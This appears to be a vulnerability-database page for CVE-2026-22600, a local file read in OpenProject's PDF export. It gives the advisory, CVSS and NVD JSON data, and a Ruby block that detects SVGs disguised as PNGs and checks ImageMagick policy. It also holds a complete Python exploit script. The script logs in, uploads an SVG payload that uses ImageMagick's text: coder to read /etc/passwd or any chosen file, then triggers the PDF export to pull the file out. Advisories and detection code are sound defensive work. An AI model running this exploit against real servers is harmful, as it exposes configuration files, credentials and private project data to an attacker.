Security Vulnerability Report
CVE-2026-22600 CVSS 9.1 CRITICAL

CVE-2026-22600

Published: 2026-01-10 02:15:49
Last Modified: 2026-01-14 22:25:56

Description

OpenProject is an open-source, web-based project management software. A Local File Read (LFR) vulnerability exists in the work package PDF export functionality of OpenProject prior to version 16.6.4. By uploading a specially crafted SVG file (disguised as a PNG) as a work package attachment, an attacker can exploit the backend image processing engine (ImageMagick). When the work package is exported to PDF, the backend attempts to resize the image, triggering the ImageMagick text: coder. This allows an attacker to read arbitrary local files that the application user has permissions to access (e.g., /etc/passwd, all project configuration files, private project data, etc.). The attack requires permissions to upload attachments to a container that can be exported to PDF, such as a work package. The issue has been patched in version 16.6.4. Those who are unable to upgrade may apply the patch manually.
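The description above pins the bug on two things: the upload layer trusts the declared type (an SVG arrives as "image/png"), and ImageMagick's text: coder is reachable when the export path resizes the attachment. The Ruby below is an added example written for this page, not code from OpenProject, from the advisory, or from ImageMagick. It shows the magic-byte check that rejects XML arriving under a raster MIME type, the same check run as a hunt over attachments already stored, and a parser that confirms an ImageMagick policy.xml really denies the TEXT coder (parsing rather than grepping, because the stock policy.xml is full of commented-out entries). Every function name (classify_upload, disguised_attachments, denied_coders, policy_blocks_text_coder?), the sample policy and the sample uploads are assumptions constructed here.

```ruby
require "rexml/document"

# --- 1. Content sniffing for image uploads -------------------------------
# ImageMagick picks a coder from the bytes it is given, not from the ".png"
# name or the image/png MIME type the client declares. So: any XML (SVG)
# arriving under a raster type is rejected outright, and a raster type must
# start with its own magic bytes.
PNG_MAGIC  = "\x89PNG\r\n\x1a\n".b.freeze
JPEG_MAGIC = "\xFF\xD8\xFF".b.freeze
GIF_MAGICS = ["GIF87a".b, "GIF89a".b].freeze

RASTER_TYPES = {
  "image/png"  => ->(bytes) { bytes.start_with?(PNG_MAGIC) },
  "image/jpeg" => ->(bytes) { bytes.start_with?(JPEG_MAGIC) },
  "image/gif"  => ->(bytes) { GIF_MAGICS.any? { |m| bytes.start_with?(m) } },
}.freeze

# True when the payload looks like an XML document (SVG included), after
# skipping a UTF-8 BOM and leading whitespace that a naive check would trip on.
def xml_like?(bytes)
  head = bytes.b
  head = head[3..-1] if head.start_with?("\xEF\xBB\xBF".b)
  head = head.lstrip[0, 64]
  ["<?xml", "<svg", "<!DOCTYPE"].any? { |tag| head.start_with?(tag) }
end

# Classifies one upload: :ok, :xml_in_raster (the trick in this advisory),
# :mismatch (wrong magic for the declared type) or :unknown_type.
def classify_upload(declared_mime, bytes)
  bytes = bytes.b
  checker = RASTER_TYPES[declared_mime]
  return :unknown_type if checker.nil?
  return :xml_in_raster if xml_like?(bytes)
  checker.call(bytes) ? :ok : :mismatch
end

# --- 2. Hunting attachments that are already stored ----------------------
# Same check after the fact: given [filename, bytes] pairs (e.g. read from
# the attachment store), return the names whose extension claims a raster
# format but whose content is XML.
EXT_TO_MIME = { "png" => "image/png", "jpg" => "image/jpeg",
                "jpeg" => "image/jpeg", "gif" => "image/gif" }.freeze

def disguised_attachments(entries)
  entries.select { |name, bytes|
    mime = EXT_TO_MIME[File.extname(name).delete_prefix(".").downcase]
    mime && classify_upload(mime, bytes) == :xml_in_raster
  }.map(&:first)
end

# --- 3. ImageMagick policy check -----------------------------------------
# The read happens when ImageMagick reaches its text: coder during the
# resize. A policy.xml that denies the TEXT coder (and MSVG/SVG, if the
# application never needs to rasterise SVG) closes that path regardless of
# what was uploaded. REXML ignores the commented-out <policy> lines that a
# grep would count as active.
def denied_coders(policy_xml)
  doc = REXML::Document.new(policy_xml)
  denied = []
  doc.elements.each("policymap/policy") do |pol|
    next unless pol.attributes["domain"] == "coder" && pol.attributes["rights"] == "none"
    denied << pol.attributes["pattern"].to_s.upcase
  end
  denied
end

def policy_blocks_text_coder?(policy_xml)
  denied = denied_coders(policy_xml)
  denied.include?("TEXT") || denied.include?("*")
end

# Constructed sample inputs (not files from any real installation).
REAL_PNG   = PNG_MAGIC + "\x00\x00\x00\x0DIHDR".b
SVG_AS_PNG = %(<?xml version="1.0" encoding="UTF-8"?>\n<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>)
SAMPLE_POLICY = <<~XML
  <?xml version="1.0" encoding="UTF-8"?>
  <policymap>
    <!-- <policy domain="coder" rights="none" pattern="PNG" /> -->
    <policy domain="coder" rights="none" pattern="TEXT" />
    <policy domain="coder" rights="none" pattern="MSVG" />
    <policy domain="coder" rights="none" pattern="SVG" />
  </policymap>
XML

if $PROGRAM_NAME == __FILE__
  puts classify_upload("image/png", REAL_PNG)      # ok
  puts classify_upload("image/png", SVG_AS_PNG)    # xml_in_raster
  puts disguised_attachments([["logo.png", REAL_PNG], ["evil.png", SVG_AS_PNG]]).inspect
  puts policy_blocks_text_coder?(SAMPLE_POLICY)    # true
end
```

Denying MSVG/SVG is only appropriate when the application never needs ImageMagick to rasterise SVG; that is a deployment decision this advisory does not make for you. Upgrading to 16.6.4 remains the fix; these checks are defence in depth and a way to find attachments uploaded before the upgrade.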

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:* - VULNERABLE
OpenProject < 16.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-22600 PoC - OpenProject Local File Read via PDF Export

This PoC demonstrates the LFR vulnerability in OpenProject's PDF export
functionality: an SVG uploaded under a .png name is handed to ImageMagick
when the export resizes it, and an <image> href using the text: coder
pulls a local file into the rendered image.
"""
import json
import re
import sys

import requests

# Malicious SVG payload, uploaded as if it were a PNG
MALICIOUS_SVG = '''<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <image href="text:;/etc/passwd" width="100" height="100"/>
</svg>'''


def create_malicious_png(target_file="/etc/passwd"):
    """Return the SVG payload pointed at `target_file`, as bytes to upload under image/png."""
    return MALICIOUS_SVG.replace("/etc/passwd", target_file).encode("utf-8")


def exploit_cve_2026_22600(base_url, username, password,
                           target_file="/etc/passwd", work_package_id=1):
    """
    Exploit CVE-2026-22600: Local File Read in OpenProject

    Args:
        base_url: OpenProject base URL
        username: Valid username with attachment upload permission
        password: User password
        target_file: File path to read (default: /etc/passwd)
        work_package_id: Work package the user may attach files to (default: 1)

    Returns:
        The exported PDF bytes if successful, None otherwise
    """
    session = requests.Session()

    try:
        # Step 1: Login to OpenProject. The login page is a Rails form, so it
        # carries an authenticity_token that has to be sent back with the POST.
        login_url = f"{base_url}/login"
        page = session.get(login_url, timeout=30)
        token_match = re.search(r'name="authenticity_token" value="([^"]+)"', page.text)
        login_data = {
            "username": username,
            "password": password,
            "login": "Sign in",
        }
        if token_match:
            login_data["authenticity_token"] = token_match.group(1)
        response = session.post(login_url, data=login_data, timeout=30)
        # A successful login redirects away from /login; a failed one re-renders
        # the form with a 200, so the status code alone proves nothing.
        if response.status_code != 200 or response.url.rstrip("/").endswith("/login"):
            print(f"[-] Login failed (status {response.status_code}, landed on {response.url})")
            return None
        print("[+] Login successful")

        # Step 2: Use an existing work package the user can attach files to
        #         (ID 1 by default, for demonstration).

        # Step 3: Upload the SVG under a .png name with an image/png MIME type.
        # The API v3 attachment endpoint takes two multipart parts: "metadata"
        # (JSON with fileName) and "file". The browser session cookie is reused;
        # if the target only accepts API keys, switch to HTTP basic auth with
        # user "apikey" and the token as password.
        upload_url = f"{base_url}/api/v3/work_packages/{work_package_id}/attachments"
        files = {
            "metadata": (None, json.dumps({"fileName": "malicious.png"}), "application/json"),
            "file": ("malicious.png", create_malicious_png(target_file), "image/png"),
        }
        response = session.post(upload_url, files=files, timeout=30)
        if response.status_code not in (200, 201):
            print(f"[-] File upload failed with status code: {response.status_code}")
            return None
        print("[+] Malicious file uploaded successfully")

        # Step 4: Trigger PDF export. Resizing the attachment during export is
        # what hands the SVG to ImageMagick. (Endpoint as used by this PoC;
        # verify it against the target's routes.)
        export_url = f"{base_url}/api/v3/work_packages/{work_package_id}/pdf_export"
        response = session.get(export_url, timeout=60)
        if response.status_code == 200:
            print("[+] PDF export triggered successfully")
            # The rendered image inside the PDF carries the target file's text.
            return response.content
        print(f"[-] PDF export failed with status code: {response.status_code}")
        return None
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python3 {sys.argv[0]} <base_url> <username> <password> [target_file] [work_package_id]")
        print(f"Example: python3 {sys.argv[0]} http://target.com:8080 admin password /etc/passwd 1")
        sys.exit(1)
    base_url = sys.argv[1].rstrip("/")
    username = sys.argv[2]
    password = sys.argv[3]
    target_file = sys.argv[4] if len(sys.argv) > 4 else "/etc/passwd"
    work_package_id = int(sys.argv[5]) if len(sys.argv) > 5 else 1
    print(f"[*] Exploiting CVE-2026-22600 on {base_url}")
    print(f"[*] Target file: {target_file}")
    result = exploit_cve_2026_22600(base_url, username, password, target_file, work_package_id)
    if result:
        with open("export.pdf", "wb") as fh:
            fh.write(result)
        print("[+] Attack completed - PDF saved to export.pdf, check it for the file contents")
    else:
        print("[-] Attack failed")

References

https://github.com/opf/openproject/releases/tag/v16.6.4 (Release Notes)
https://github.com/opf/openproject/security/advisories/GHSA-m8f2-cwpq-vvhh (Patch)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22600",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-10T02:15:48.743",
    "lastModified": "2026-01-14T22:25:56.047",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenProject is an open-source, web-based project management software. A Local File Read (LFR) vulnerability exists in the work package PDF export functionality of OpenProject prior to version 16.6.4. By uploading a specially crafted SVG file (disguised as a PNG) as a work package attachment, an attacker can exploit the backend image processing engine (ImageMagick). When the work package is exported to PDF, the backend attempts to resize the image, triggering the ImageMagick text: coder. This allows an attacker to read arbitrary local files that the application user has permissions to access (e.g., /etc/passwd, all project configuration files, private project data, etc.). The attack requires permissions to upload attachments to a container that can be exported to PDF, such as a work package. The issue has been patched in version 16.6.4. Those who are unable to upgrade may apply the patch manually."
      },
      {
        "lang": "es",
        "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. Una vulnerabilidad de lectura de archivos locales (LFR) existe en la funcionalidad de exportación a PDF de paquetes de trabajo de OpenProject anterior a la versión 16.6.4. Al cargar un archivo SVG especialmente diseñado (disfrazado como PNG) como adjunto de un paquete de trabajo, un atacante puede explotar el motor de procesamiento de imágenes de backend (ImageMagick). Cuando el paquete de trabajo se exporta a PDF, el backend intenta redimensionar la imagen, lo que activa el ImageMagick text: coder. Esto permite a un atacante leer archivos locales arbitrarios a los que el usuario de la aplicación tiene permisos de acceso (por ejemplo, /etc/passwd, todos los archivos de configuración del proyecto, datos privados del proyecto, etc.). El ataque requiere permisos para cargar adjuntos a un contenedor que pueda exportarse a PDF, como un paquete de trabajo. El problema ha sido parcheado en la versión 16.6.4. Aquellos que no puedan actualizar pueden aplicar el parche manualmente."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 5.3
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 5.3
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-200"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "16.6.4",
                "matchCriteriaId": "6F91D546-F062-436F-B174-02FCE95C2376"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/opf/openproject/releases/tag/v16.6.4",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/opf/openproject/security/advisories/GHSA-m8f2-cwpq-vvhh",
        "source": "[email protected]",
        "tags": ["Patch"]
      }
    ]
  }
}